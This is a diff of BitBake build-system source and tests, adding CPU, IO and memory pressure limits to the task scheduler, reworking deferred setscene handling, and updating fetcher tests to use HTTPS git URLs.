@@ -155,6 +205,12 @@ class RunQueueScheduler(object):
155 if not buildable: 205 if not buildable:
156 return None 206 return None
157 207
208 # Bitbake requires that at least one task be active. Only check for pressure if
209 # this is the case, otherwise the pressure limitation could result in no tasks
210 # being active and no new tasks started thereby, at times, breaking the scheduler.
211 if self.rq.stats.active and self.exceeds_max_pressure():
212 return None
213
158 # Filter out tasks that have a max number of threads that have been exceeded 214 # Filter out tasks that have a max number of threads that have been exceeded
159 skip_buildable = {} 215 skip_buildable = {}
160 for running in self.rq.runq_running.difference(self.rq.runq_complete): 216 for running in self.rq.runq_running.difference(self.rq.runq_complete):
@@ -1256,8 +1312,8 @@ class RunQueue:
1256 "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv, 1312 "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv,
1257 "sigdata" : bb.parse.siggen.get_taskdata(), 1313 "sigdata" : bb.parse.siggen.get_taskdata(),
1258 "logdefaultlevel" : bb.msg.loggerDefaultLogLevel, 1314 "logdefaultlevel" : bb.msg.loggerDefaultLogLevel,
1259 "logdefaultverbose" : bb.msg.loggerDefaultVerbose, 1315 "build_verbose_shell" : self.cooker.configuration.build_verbose_shell,
1260 "logdefaultverboselogs" : bb.msg.loggerVerboseLogs, 1316 "build_verbose_stdout" : self.cooker.configuration.build_verbose_stdout,
1261 "logdefaultdomain" : bb.msg.loggerDefaultDomains, 1317 "logdefaultdomain" : bb.msg.loggerDefaultDomains,
1262 "prhost" : self.cooker.prhost, 1318 "prhost" : self.cooker.prhost,
1263 "buildname" : self.cfgData.getVar("BUILDNAME"), 1319 "buildname" : self.cfgData.getVar("BUILDNAME"),
@@ -1700,6 +1756,9 @@ class RunQueueExecute:
1700 1756
1701 self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1) 1757 self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1)
1702 self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed" 1758 self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed"
1759 self.max_cpu_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_CPU")
1760 self.max_io_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_IO")
1761 self.max_memory_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_MEMORY")
1703 1762
1704 self.sq_buildable = set() 1763 self.sq_buildable = set()
1705 self.sq_running = set() 1764 self.sq_running = set()
@@ -1735,6 +1794,29 @@ class RunQueueExecute:
1735 if self.number_tasks <= 0: 1794 if self.number_tasks <= 0:
1736 bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks) 1795 bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks)
1737 1796
1797 lower_limit = 1.0
1798 upper_limit = 1000000.0
1799 if self.max_cpu_pressure:
1800 self.max_cpu_pressure = float(self.max_cpu_pressure)
1801 if self.max_cpu_pressure < lower_limit:
1802 bb.fatal("Invalid BB_PRESSURE_MAX_CPU %s, minimum value is %s." % (self.max_cpu_pressure, lower_limit))
1803 if self.max_cpu_pressure > upper_limit:
1804 bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_CPU is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_cpu_pressure))
1805
1806 if self.max_io_pressure:
1807 self.max_io_pressure = float(self.max_io_pressure)
1808 if self.max_io_pressure < lower_limit:
1809 bb.fatal("Invalid BB_PRESSURE_MAX_IO %s, minimum value is %s." % (self.max_io_pressure, lower_limit))
1810 if self.max_io_pressure > upper_limit:
1811 bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_IO is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
1812
1813 if self.max_memory_pressure:
1814 self.max_memory_pressure = float(self.max_memory_pressure)
1815 if self.max_memory_pressure < lower_limit:
1816 bb.fatal("Invalid BB_PRESSURE_MAX_MEMORY %s, minimum value is %s." % (self.max_memory_pressure, lower_limit))
1817 if self.max_memory_pressure > upper_limit:
1818 bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_MEMORY is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
1819
1738 # List of setscene tasks which we've covered 1820 # List of setscene tasks which we've covered
1739 self.scenequeue_covered = set() 1821 self.scenequeue_covered = set()
1740 # List of tasks which are covered (including setscene ones) 1822 # List of tasks which are covered (including setscene ones)
@@ -1893,6 +1975,20 @@ class RunQueueExecute:
1893 self.setbuildable(revdep) 1975 self.setbuildable(revdep)
1894 logger.debug(1, "Marking task %s as buildable", revdep) 1976 logger.debug(1, "Marking task %s as buildable", revdep)
1895 1977
1978 found = None
1979 for t in sorted(self.sq_deferred.copy()):
1980 if self.sq_deferred[t] == task:
1981 # Allow the next deferred task to run. Any other deferred tasks should be deferred after that task.
1982 # We shouldn't allow all to run at once as it is prone to races.
1983 if not found:
1984 bb.note("Deferred task %s now buildable" % t)
1985 del self.sq_deferred[t]
1986 update_scenequeue_data([t], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
1987 found = t
1988 else:
1989 bb.note("Deferring %s after %s" % (t, found))
1990 self.sq_deferred[t] = found
1991
1896 def task_complete(self, task): 1992 def task_complete(self, task):
1897 self.stats.taskCompleted() 1993 self.stats.taskCompleted()
1898 bb.event.fire(runQueueTaskCompleted(task, self.stats, self.rq), self.cfgData) 1994 bb.event.fire(runQueueTaskCompleted(task, self.stats, self.rq), self.cfgData)
@@ -1934,6 +2030,10 @@ class RunQueueExecute:
1934 logger.error("Scenequeue had holdoff tasks: %s" % pprint.pformat(self.holdoff_tasks)) 2030 logger.error("Scenequeue had holdoff tasks: %s" % pprint.pformat(self.holdoff_tasks))
1935 err = True 2031 err = True
1936 2032
2033 for tid in self.scenequeue_covered.intersection(self.scenequeue_notcovered):
2034 # No task should end up in both covered and uncovered, that is a bug.
2035 logger.error("Setscene task %s in both covered and notcovered." % tid)
2036
1937 for tid in self.rqdata.runq_setscene_tids: 2037 for tid in self.rqdata.runq_setscene_tids:
1938 if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered: 2038 if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
1939 err = True 2039 err = True
@@ -1998,8 +2098,6 @@ class RunQueueExecute:
1998 logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask) 2098 logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask)
1999 self.sq_task_failoutright(nexttask) 2099 self.sq_task_failoutright(nexttask)
2000 return True 2100 return True
2001 else:
2002 self.sqdata.outrightfail.remove(nexttask)
2003 if nexttask in self.sqdata.outrightfail: 2101 if nexttask in self.sqdata.outrightfail:
2004 logger.debug(2, 'No package found, so skipping setscene task %s', nexttask) 2102 logger.debug(2, 'No package found, so skipping setscene task %s', nexttask)
2005 self.sq_task_failoutright(nexttask) 2103 self.sq_task_failoutright(nexttask)
@@ -2150,7 +2248,8 @@ class RunQueueExecute:
2150 if self.sq_deferred: 2248 if self.sq_deferred:
2151 tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0]) 2249 tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0])
2152 logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid) 2250 logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid)
2153 self.sq_task_failoutright(tid) 2251 if tid not in self.runq_complete:
2252 self.sq_task_failoutright(tid)
2154 return True 2253 return True
2155 2254
2156 if len(self.failed_tids) != 0: 2255 if len(self.failed_tids) != 0:
@@ -2264,10 +2363,16 @@ class RunQueueExecute:
2264 self.updated_taskhash_queue.remove((tid, unihash)) 2363 self.updated_taskhash_queue.remove((tid, unihash))
2265 2364
2266 if unihash != self.rqdata.runtaskentries[tid].unihash: 2365 if unihash != self.rqdata.runtaskentries[tid].unihash:
2267 hashequiv_logger.verbose("Task %s unihash changed to %s" % (tid, unihash)) 2366 # Make sure we rehash any other tasks with the same task hash that we're deferred against.
2268 self.rqdata.runtaskentries[tid].unihash = unihash 2367 torehash = [tid]
2269 bb.parse.siggen.set_unihash(tid, unihash) 2368 for deftid in self.sq_deferred:
2270 toprocess.add(tid) 2369 if self.sq_deferred[deftid] == tid:
2370 torehash.append(deftid)
2371 for hashtid in torehash:
2372 hashequiv_logger.verbose("Task %s unihash changed to %s" % (hashtid, unihash))
2373 self.rqdata.runtaskentries[hashtid].unihash = unihash
2374 bb.parse.siggen.set_unihash(hashtid, unihash)
2375 toprocess.add(hashtid)
2271 2376
2272 # Work out all tasks which depend upon these 2377 # Work out all tasks which depend upon these
2273 total = set() 2378 total = set()
@@ -2406,6 +2511,14 @@ class RunQueueExecute:
2406 2511
2407 if update_tasks: 2512 if update_tasks:
2408 self.sqdone = False 2513 self.sqdone = False
2514 for mc in sorted(self.sqdata.multiconfigs):
2515 for tid in sorted([t[0] for t in update_tasks]):
2516 if mc_from_tid(tid) != mc:
2517 continue
2518 h = pending_hash_index(tid, self.rqdata)
2519 if h in self.sqdata.hashes and tid != self.sqdata.hashes[h]:
2520 self.sq_deferred[tid] = self.sqdata.hashes[h]
2521 bb.note("Deferring %s after %s" % (tid, self.sqdata.hashes[h]))
2409 update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False) 2522 update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
2410 2523
2411 for (tid, harddepfail, origvalid) in update_tasks: 2524 for (tid, harddepfail, origvalid) in update_tasks:
@@ -2421,6 +2534,9 @@ class RunQueueExecute:
2421 2534
2422 for dep in sorted(self.sqdata.sq_deps[task]): 2535 for dep in sorted(self.sqdata.sq_deps[task]):
2423 if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]: 2536 if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]:
2537 if dep in self.scenequeue_covered or dep in self.scenequeue_notcovered:
2538 # dependency could be already processed, e.g. noexec setscene task
2539 continue
2424 logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep)) 2540 logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep))
2425 self.sq_task_failoutright(dep) 2541 self.sq_task_failoutright(dep)
2426 continue 2542 continue
@@ -2743,6 +2859,19 @@ def build_scenequeue_data(sqdata, rqdata, rq, cooker, stampcache, sqrq):
2743 sqdata.stamppresent = set() 2859 sqdata.stamppresent = set()
2744 sqdata.valid = set() 2860 sqdata.valid = set()
2745 2861
2862 sqdata.hashes = {}
2863 sqrq.sq_deferred = {}
2864 for mc in sorted(sqdata.multiconfigs):
2865 for tid in sorted(sqdata.sq_revdeps):
2866 if mc_from_tid(tid) != mc:
2867 continue
2868 h = pending_hash_index(tid, rqdata)
2869 if h not in sqdata.hashes:
2870 sqdata.hashes[h] = tid
2871 else:
2872 sqrq.sq_deferred[tid] = sqdata.hashes[h]
2873 bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
2874
2746 update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True) 2875 update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True)
2747 2876
2748def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True): 2877def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True):
@@ -2754,6 +2883,8 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
2754 sqdata.stamppresent.remove(tid) 2883 sqdata.stamppresent.remove(tid)
2755 if tid in sqdata.valid: 2884 if tid in sqdata.valid:
2756 sqdata.valid.remove(tid) 2885 sqdata.valid.remove(tid)
2886 if tid in sqdata.outrightfail:
2887 sqdata.outrightfail.remove(tid)
2757 2888
2758 (mc, fn, taskname, taskfn) = split_tid_mcfn(tid) 2889 (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
2759 2890
@@ -2781,28 +2912,20 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
2781 2912
2782 sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary) 2913 sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary)
2783 2914
2784 sqdata.hashes = {} 2915 for tid in tids:
2785 for mc in sorted(sqdata.multiconfigs): 2916 if tid in sqdata.stamppresent:
2786 for tid in sorted(sqdata.sq_revdeps): 2917 continue
2787 if mc_from_tid(tid) != mc: 2918 if tid in sqdata.valid:
2788 continue 2919 continue
2789 if tid in sqdata.stamppresent: 2920 if tid in sqdata.noexec:
2790 continue 2921 continue
2791 if tid in sqdata.valid: 2922 if tid in sqrq.scenequeue_covered:
2792 continue 2923 continue
2793 if tid in sqdata.noexec: 2924 if tid in sqrq.scenequeue_notcovered:
2794 continue 2925 continue
2795 if tid in sqrq.scenequeue_notcovered: 2926 if tid in sqrq.sq_deferred:
2796 continue 2927 continue
2797 sqdata.outrightfail.add(tid) 2928 sqdata.outrightfail.add(tid)
2798
2799 h = pending_hash_index(tid, rqdata)
2800 if h not in sqdata.hashes:
2801 sqdata.hashes[h] = tid
2802 else:
2803 sqrq.sq_deferred[tid] = sqdata.hashes[h]
2804 bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
2805
2806 2929
2807class TaskFailure(Exception): 2930class TaskFailure(Exception):
2808 """ 2931 """
diff --git a/bitbake/lib/bb/server/process.py b/bitbake/lib/bb/server/process.py
index b66fbe0acd..4bdb84ae37 100644
--- a/bitbake/lib/bb/server/process.py
+++ b/bitbake/lib/bb/server/process.py
@@ -25,6 +25,7 @@ import subprocess
25import errno 25import errno
26import re 26import re
27import datetime 27import datetime
28import gc
28import bb.server.xmlrpcserver 29import bb.server.xmlrpcserver
29from bb import daemonize 30from bb import daemonize
30from multiprocessing import queues 31from multiprocessing import queues
@@ -152,7 +153,8 @@ class ProcessServer(multiprocessing.Process):
152 conn = newconnections.pop(-1) 153 conn = newconnections.pop(-1)
153 fds.append(conn) 154 fds.append(conn)
154 self.controllersock = conn 155 self.controllersock = conn
155 elif self.timeout is None and not ready: 156
157 elif not self.timeout and not ready:
156 print("No timeout, exiting.") 158 print("No timeout, exiting.")
157 self.quit = True 159 self.quit = True
158 160
@@ -220,6 +222,7 @@ class ProcessServer(multiprocessing.Process):
220 try: 222 try:
221 print("Running command %s" % command) 223 print("Running command %s" % command)
222 self.command_channel_reply.send(self.cooker.command.runCommand(command)) 224 self.command_channel_reply.send(self.cooker.command.runCommand(command))
225 print("Command Completed")
223 except Exception as e: 226 except Exception as e:
224 logger.exception('Exception in server main event loop running command %s (%s)' % (command, str(e))) 227 logger.exception('Exception in server main event loop running command %s (%s)' % (command, str(e)))
225 228
@@ -347,7 +350,12 @@ class ServerCommunicator():
347 logger.info("No reply from server in 30s") 350 logger.info("No reply from server in 30s")
348 if not self.recv.poll(30): 351 if not self.recv.poll(30):
349 raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)") 352 raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)")
350 return self.recv.get() 353 ret, exc = self.recv.get()
354 # Should probably turn all exceptions in exc back into exceptions?
355 # For now, at least handle BBHandledException
356 if exc and "BBHandledException" in exc:
357 raise bb.BBHandledException()
358 return ret, exc
351 359
352 def updateFeatureSet(self, featureset): 360 def updateFeatureSet(self, featureset):
353 _, error = self.runCommand(["setFeatures", featureset]) 361 _, error = self.runCommand(["setFeatures", featureset])
@@ -586,7 +594,7 @@ class BBUIEventQueue:
586 self.reader = ConnectionReader(readfd) 594 self.reader = ConnectionReader(readfd)
587 595
588 self.t = threading.Thread() 596 self.t = threading.Thread()
589 self.t.setDaemon(True) 597 self.t.daemon = True
590 self.t.run = self.startCallbackHandler 598 self.t.run = self.startCallbackHandler
591 self.t.start() 599 self.t.start()
592 600
@@ -664,8 +672,10 @@ class ConnectionWriter(object):
664 672
665 def send(self, obj): 673 def send(self, obj):
666 obj = multiprocessing.reduction.ForkingPickler.dumps(obj) 674 obj = multiprocessing.reduction.ForkingPickler.dumps(obj)
675 gc.disable()
667 with self.wlock: 676 with self.wlock:
668 self.writer.send_bytes(obj) 677 self.writer.send_bytes(obj)
678 gc.enable()
669 679
670 def fileno(self): 680 def fileno(self):
671 return self.writer.fileno() 681 return self.writer.fileno()
diff --git a/bitbake/lib/bb/siggen.py b/bitbake/lib/bb/siggen.py
index 26fa7f05ce..9d4f67aa90 100644
--- a/bitbake/lib/bb/siggen.py
+++ b/bitbake/lib/bb/siggen.py
@@ -318,7 +318,8 @@ class SignatureGeneratorBasic(SignatureGenerator):
318 else: 318 else:
319 sigfile = stampbase + "." + task + ".sigbasedata" + "." + self.basehash[tid] 319 sigfile = stampbase + "." + task + ".sigbasedata" + "." + self.basehash[tid]
320 320
321 bb.utils.mkdirhier(os.path.dirname(sigfile)) 321 with bb.utils.umask(0o002):
322 bb.utils.mkdirhier(os.path.dirname(sigfile))
322 323
323 data = {} 324 data = {}
324 data['task'] = task 325 data['task'] = task
diff --git a/bitbake/lib/bb/tests/codeparser.py b/bitbake/lib/bb/tests/codeparser.py
index 826a2d2f6d..f1c4f618d8 100644
--- a/bitbake/lib/bb/tests/codeparser.py
+++ b/bitbake/lib/bb/tests/codeparser.py
@@ -111,9 +111,9 @@ ${D}${libdir}/pkgconfig/*.pc
111 self.assertExecs(set(["sed"])) 111 self.assertExecs(set(["sed"]))
112 112
113 def test_parameter_expansion_modifiers(self): 113 def test_parameter_expansion_modifiers(self):
114 # - and + are also valid modifiers for parameter expansion, but are 114 # -,+ and : are also valid modifiers for parameter expansion, but are
115 # valid characters in bitbake variable names, so are not included here 115 # valid characters in bitbake variable names, so are not included here
116 for i in ('=', ':-', ':=', '?', ':?', ':+', '#', '%', '##', '%%'): 116 for i in ('=', '?', '#', '%', '##', '%%'):
117 name = "foo%sbar" % i 117 name = "foo%sbar" % i
118 self.parseExpression("${%s}" % name) 118 self.parseExpression("${%s}" % name)
119 self.assertNotIn(name, self.references) 119 self.assertNotIn(name, self.references)
@@ -412,6 +412,32 @@ esac
412 # Check final value 412 # Check final value
413 self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['anothervalue', 'yetanothervalue', 'lastone']) 413 self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['anothervalue', 'yetanothervalue', 'lastone'])
414 414
415 def test_contains_vardeps_override_operators(self):
416 # Check override operators handle dependencies correctly with the contains functionality
417 expr_plain = 'testval'
418 expr_prepend = '${@bb.utils.filter("TESTVAR1", "testval1", d)} '
419 expr_append = ' ${@bb.utils.filter("TESTVAR2", "testval2", d)}'
420 expr_remove = '${@bb.utils.contains("TESTVAR3", "no-testval", "testval", "", d)}'
421 # Check dependencies
422 self.d.setVar('ANOTHERVAR', expr_plain)
423 self.d.prependVar('ANOTHERVAR', expr_prepend)
424 self.d.appendVar('ANOTHERVAR', expr_append)
425 self.d.setVar('ANOTHERVAR:remove', expr_remove)
426 self.d.setVar('TESTVAR1', 'blah')
427 self.d.setVar('TESTVAR2', 'testval2')
428 self.d.setVar('TESTVAR3', 'no-testval')
429 deps, values = bb.data.build_dependencies("ANOTHERVAR", set(self.d.keys()), set(), set(), self.d)
430 self.assertEqual(sorted(values.splitlines()),
431 sorted([
432 expr_prepend + expr_plain + expr_append,
433 '_remove of ' + expr_remove,
434 'TESTVAR1{testval1} = Unset',
435 'TESTVAR2{testval2} = Set',
436 'TESTVAR3{no-testval} = Set',
437 ]))
438 # Check final value
439 self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['testval2'])
440
415 #Currently no wildcard support 441 #Currently no wildcard support
416 #def test_vardeps_wildcards(self): 442 #def test_vardeps_wildcards(self):
417 # self.d.setVar("oe_libinstall", "echo test") 443 # self.d.setVar("oe_libinstall", "echo test")
diff --git a/bitbake/lib/bb/tests/event.py b/bitbake/lib/bb/tests/event.py
index 9229b63d47..9ca7e9bc8e 100644
--- a/bitbake/lib/bb/tests/event.py
+++ b/bitbake/lib/bb/tests/event.py
@@ -6,17 +6,18 @@
6# SPDX-License-Identifier: GPL-2.0-only 6# SPDX-License-Identifier: GPL-2.0-only
7# 7#
8 8
9import unittest 9import collections
10import bb
11import logging
12import bb.compat
13import bb.event
14import importlib 10import importlib
11import logging
12import pickle
15import threading 13import threading
16import time 14import time
17import pickle 15import unittest
18from unittest.mock import Mock 16from unittest.mock import Mock
19from unittest.mock import call 17from unittest.mock import call
18
19import bb
20import bb.event
20from bb.msg import BBLogFormatter 21from bb.msg import BBLogFormatter
21 22
22 23
@@ -75,7 +76,7 @@ class EventHandlingTest(unittest.TestCase):
75 76
76 def _create_test_handlers(self): 77 def _create_test_handlers(self):
77 """ Method used to create a test handler ordered dictionary """ 78 """ Method used to create a test handler ordered dictionary """
78 test_handlers = bb.compat.OrderedDict() 79 test_handlers = collections.OrderedDict()
79 test_handlers["handler1"] = self._test_process.handler1 80 test_handlers["handler1"] = self._test_process.handler1
80 test_handlers["handler2"] = self._test_process.handler2 81 test_handlers["handler2"] = self._test_process.handler2
81 return test_handlers 82 return test_handlers
@@ -96,7 +97,7 @@ class EventHandlingTest(unittest.TestCase):
96 97
97 def test_clean_class_handlers(self): 98 def test_clean_class_handlers(self):
98 """ Test clean_class_handlers method """ 99 """ Test clean_class_handlers method """
99 cleanDict = bb.compat.OrderedDict() 100 cleanDict = collections.OrderedDict()
100 self.assertEqual(cleanDict, 101 self.assertEqual(cleanDict,
101 bb.event.clean_class_handlers()) 102 bb.event.clean_class_handlers())
102 103
diff --git a/bitbake/lib/bb/tests/fetch.py b/bitbake/lib/bb/tests/fetch.py
index 9453c90d2b..61dd5cccaf 100644
--- a/bitbake/lib/bb/tests/fetch.py
+++ b/bitbake/lib/bb/tests/fetch.py
@@ -371,6 +371,7 @@ class FetcherTest(unittest.TestCase):
371 if os.environ.get("BB_TMPDIR_NOCLEAN") == "yes": 371 if os.environ.get("BB_TMPDIR_NOCLEAN") == "yes":
372 print("Not cleaning up %s. Please remove manually." % self.tempdir) 372 print("Not cleaning up %s. Please remove manually." % self.tempdir)
373 else: 373 else:
374 bb.process.run('chmod u+rw -R %s' % self.tempdir)
374 bb.utils.prunedir(self.tempdir) 375 bb.utils.prunedir(self.tempdir)
375 376
376class MirrorUriTest(FetcherTest): 377class MirrorUriTest(FetcherTest):
@@ -471,7 +472,7 @@ class GitDownloadDirectoryNamingTest(FetcherTest):
471 super(GitDownloadDirectoryNamingTest, self).setUp() 472 super(GitDownloadDirectoryNamingTest, self).setUp()
472 self.recipe_url = "git://git.openembedded.org/bitbake" 473 self.recipe_url = "git://git.openembedded.org/bitbake"
473 self.recipe_dir = "git.openembedded.org.bitbake" 474 self.recipe_dir = "git.openembedded.org.bitbake"
474 self.mirror_url = "git://github.com/openembedded/bitbake.git" 475 self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
475 self.mirror_dir = "github.com.openembedded.bitbake.git" 476 self.mirror_dir = "github.com.openembedded.bitbake.git"
476 477
477 self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40') 478 self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40')
@@ -519,7 +520,7 @@ class TarballNamingTest(FetcherTest):
519 super(TarballNamingTest, self).setUp() 520 super(TarballNamingTest, self).setUp()
520 self.recipe_url = "git://git.openembedded.org/bitbake" 521 self.recipe_url = "git://git.openembedded.org/bitbake"
521 self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz" 522 self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz"
522 self.mirror_url = "git://github.com/openembedded/bitbake.git" 523 self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
523 self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz" 524 self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz"
524 525
525 self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1') 526 self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1')
@@ -553,7 +554,7 @@ class GitShallowTarballNamingTest(FetcherTest):
553 super(GitShallowTarballNamingTest, self).setUp() 554 super(GitShallowTarballNamingTest, self).setUp()
554 self.recipe_url = "git://git.openembedded.org/bitbake" 555 self.recipe_url = "git://git.openembedded.org/bitbake"
555 self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz" 556 self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz"
556 self.mirror_url = "git://github.com/openembedded/bitbake.git" 557 self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
557 self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz" 558 self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz"
558 559
559 self.d.setVar('BB_GIT_SHALLOW', '1') 560 self.d.setVar('BB_GIT_SHALLOW', '1')
@@ -649,6 +650,58 @@ class FetcherLocalTest(FetcherTest):
649 with self.assertRaises(bb.fetch2.UnpackError): 650 with self.assertRaises(bb.fetch2.UnpackError):
650 self.fetchUnpack(['file://a;subdir=/bin/sh']) 651 self.fetchUnpack(['file://a;subdir=/bin/sh'])
651 652
653 def test_local_gitfetch_usehead(self):
654 # Create dummy local Git repo
655 src_dir = tempfile.mkdtemp(dir=self.tempdir,
656 prefix='gitfetch_localusehead_')
657 src_dir = os.path.abspath(src_dir)
658 bb.process.run("git init", cwd=src_dir)
659 bb.process.run("git commit --allow-empty -m'Dummy commit'",
660 cwd=src_dir)
661 # Use other branch than master
662 bb.process.run("git checkout -b my-devel", cwd=src_dir)
663 bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
664 cwd=src_dir)
665 stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
666 orig_rev = stdout[0].strip()
667
668 # Fetch and check revision
669 self.d.setVar("SRCREV", "AUTOINC")
670 url = "git://" + src_dir + ";protocol=file;usehead=1"
671 fetcher = bb.fetch.Fetch([url], self.d)
672 fetcher.download()
673 fetcher.unpack(self.unpackdir)
674 stdout = bb.process.run("git rev-parse HEAD",
675 cwd=os.path.join(self.unpackdir, 'git'))
676 unpack_rev = stdout[0].strip()
677 self.assertEqual(orig_rev, unpack_rev)
678
679 def test_local_gitfetch_usehead_withname(self):
680 # Create dummy local Git repo
681 src_dir = tempfile.mkdtemp(dir=self.tempdir,
682 prefix='gitfetch_localusehead_')
683 src_dir = os.path.abspath(src_dir)
684 bb.process.run("git init", cwd=src_dir)
685 bb.process.run("git commit --allow-empty -m'Dummy commit'",
686 cwd=src_dir)
687 # Use other branch than master
688 bb.process.run("git checkout -b my-devel", cwd=src_dir)
689 bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
690 cwd=src_dir)
691 stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
692 orig_rev = stdout[0].strip()
693
694 # Fetch and check revision
695 self.d.setVar("SRCREV", "AUTOINC")
696 url = "git://" + src_dir + ";protocol=file;usehead=1;name=newName"
697 fetcher = bb.fetch.Fetch([url], self.d)
698 fetcher.download()
699 fetcher.unpack(self.unpackdir)
700 stdout = bb.process.run("git rev-parse HEAD",
701 cwd=os.path.join(self.unpackdir, 'git'))
702 unpack_rev = stdout[0].strip()
703 self.assertEqual(orig_rev, unpack_rev)
704
652class FetcherNoNetworkTest(FetcherTest): 705class FetcherNoNetworkTest(FetcherTest):
653 def setUp(self): 706 def setUp(self):
654 super().setUp() 707 super().setUp()
@@ -845,6 +898,8 @@ class FetcherNetworkTest(FetcherTest):
845 prefix='gitfetch_localusehead_') 898 prefix='gitfetch_localusehead_')
846 src_dir = os.path.abspath(src_dir) 899 src_dir = os.path.abspath(src_dir)
847 bb.process.run("git init", cwd=src_dir) 900 bb.process.run("git init", cwd=src_dir)
901 bb.process.run("git config user.email 'you@example.com'", cwd=src_dir)
902 bb.process.run("git config user.name 'Your Name'", cwd=src_dir)
848 bb.process.run("git commit --allow-empty -m'Dummy commit'", 903 bb.process.run("git commit --allow-empty -m'Dummy commit'",
849 cwd=src_dir) 904 cwd=src_dir)
850 # Use other branch than master 905 # Use other branch than master
@@ -918,7 +973,7 @@ class FetcherNetworkTest(FetcherTest):
918 def test_git_submodule_dbus_broker(self): 973 def test_git_submodule_dbus_broker(self):
919 # The following external repositories have show failures in fetch and unpack operations 974 # The following external repositories have show failures in fetch and unpack operations
920 # We want to avoid regressions! 975 # We want to avoid regressions!
921 url = "gitsm://github.com/bus1/dbus-broker;protocol=git;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" 976 url = "gitsm://github.com/bus1/dbus-broker;protocol=https;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main"
922 fetcher = bb.fetch.Fetch([url], self.d) 977 fetcher = bb.fetch.Fetch([url], self.d)
923 fetcher.download() 978 fetcher.download()
924 # Previous cwd has been deleted 979 # Previous cwd has been deleted
@@ -934,7 +989,7 @@ class FetcherNetworkTest(FetcherTest):
934 989
935 @skipIfNoNetwork() 990 @skipIfNoNetwork()
936 def test_git_submodule_CLI11(self): 991 def test_git_submodule_CLI11(self):
937 url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf" 992 url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf;branch=main"
